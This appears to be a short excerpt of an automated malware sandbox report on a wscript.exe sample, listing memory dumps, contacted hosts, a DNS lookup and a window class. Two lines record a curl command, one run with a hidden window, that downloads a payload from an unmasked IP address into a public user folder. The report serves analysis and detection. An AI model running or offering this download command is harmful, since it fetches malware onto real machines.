Technical Information
- %TEMP%\content\4348-1852-wscript.exe-19-50-30-073.dump
- %TEMP%\content\4348-1852-wscript.exe-19-50-30-125.dump
- %TEMP%\content\4348-1852-wscript.exe-19-50-47-105.dump
- 'co####erhope.com':443
- '15#.#36.14.86':80
- http://15#.#36.14.86/gF1sH2v/CD546
- 'co####erhope.com':443
- DNS ASK co####erhope.com
- ClassName: 'OleMainThreadWndClass' WindowName: ''
- '<SYSTEM32>\curl.exe' -o c:\users\public\luckiest.tmp http://151.236.14.86/gF1sH2v/CD546' (with hidden window)
- '<SYSTEM32>\curl.exe' -o c:\users\public\luckiest.tmp http://151.236.14.86/gF1sH2v/CD546